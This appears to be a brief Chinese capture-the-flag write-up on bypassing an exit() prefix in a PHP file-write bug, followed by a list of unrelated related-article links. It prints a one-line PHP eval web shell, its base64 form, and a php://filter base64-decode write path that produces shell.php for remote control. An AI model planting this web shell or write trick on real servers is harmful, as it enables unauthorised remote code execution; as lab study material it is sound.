代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
每天一把堆栈17 小时前
pctf-pwn(2025)程序员学习随笔17 小时前
深入剖析 std::optional:实现原理、性能优化与安全编程实践菩提小狗17 小时前
每日安全情报报告 · 2026-04-10上海控安17 小时前
嵌入式软件安全解决之道-堆栈分析篇JS_SWKJ17 小时前
网闸核心技术详解:数据“安全渡河”的物理密码AcrelGHP17 小时前
AIM-D系列直流IT系统绝缘监测产品:筑牢直流电气安全第一道防线志栋智能17 小时前
安全超自动化如何缩短平均检测与响应时间?arvin_xiaoting18 小时前
OpenClaw学习总结_IV_认证与安全_1:OAuth与认证详解qq_2602412318 小时前
将盾CDN:云原生安全的发展与实践流觞 无依19 小时前
DedeCMS plus/list.php 参数注入(SQL注入)修复教程